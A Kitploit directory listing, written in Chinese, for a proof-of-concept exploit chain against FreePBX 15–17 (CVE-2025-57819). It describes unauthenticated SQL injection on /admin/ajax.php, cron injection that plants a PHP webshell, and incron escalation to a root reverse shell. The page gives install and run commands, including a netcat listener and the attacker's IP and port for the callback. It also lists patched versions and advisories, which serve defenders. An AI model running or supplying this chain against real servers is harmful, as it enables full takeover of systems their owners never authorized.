Skip to content
KitploitKITPLOIT
工具漏洞利用博客
Log in
提交
工具漏洞利用博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2025-57819-FreePBX-RCE2Root — FreePBX 15、16和17的完整链CVE-2025-57819 PoC:未经身份验证的SQL注入到RCE和root接管。 | Kitploit
工具/GitHubGitHub/ozcanpng/cve-2025-57819-freepbx-rce2root
权限提升漏洞分析漏洞利用Web应用程序漏洞利用渗透测试红队Payload 开发
GitHubozcanpng/cve-2025-57819-freepbx-rce2root

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2025-57819-FreePBX-RCE2Root

FreePBX 15、16和17的完整链CVE-2025-57819 PoC:未经身份验证的SQL注入到RCE和root接管。

查看仓库
1143个月前尚未审核

CVE-2025-57819 — FreePBX SQLi → RCE → Root

完整利用链PoC,针对CVE-2025-57819。FreePBX的endpoint模块中存在未认证的基于错误的SQL注入,通过cron任务注入和incron权限提升,最终获得root shell。

仅供授权测试与研究使用。请勿用于非自己拥有的系统。


功能说明

SQLi (EXTRACTVALUE) → 插入cron任务 → 写入webshell → incron触发 → root shell
  1. 通过在 /admin/ajax.php 上进行基于错误的注入,提取数据库信息
  2. 注入一个cron任务,向Web根目录写入PHP webshell
  3. 等待cron执行(约60秒),确认以 asterisk 用户身份获得RCE
  4. 创建一个incron触发文件,以root身份触发 fwconsole 钩子
  5. 在监听端捕捉反弹shell

安装

git clone https://github.com/ozcanpng/CVE-2025-57819-FreePBX-RCE2Root
cd CVE-2025-57819-FreePBX-RCE2Root
pip install -r requirements.txt

使用方法

python3 CVE-2025-57819.py <目标> <本机IP> <本机端口> [--cleanup]

首先启动监听:

nc -lvnp 9999

然后运行:

python3 CVE-2025-57819.py freepbx.example.com 192.168.1.50 9999

--cleanup 参数可在利用后清除webshell和cron任务。


受影响版本

安装了 endpoint 模块的FreePBX。/admin/ajax.php 中的 brand 参数未经清理直接传入SQL查询。

FreePBX修补版本
15.x15.0.66
16.x16.0.89
17.x17.0.3

参考

  • FreePBX安全公告 GHSA-m42g-xg4c-5f3h
  • NVD — CVE-2025-57819

作者

ozcanpng — github.com/ozcanpng — ozcanpng.dev

下载工具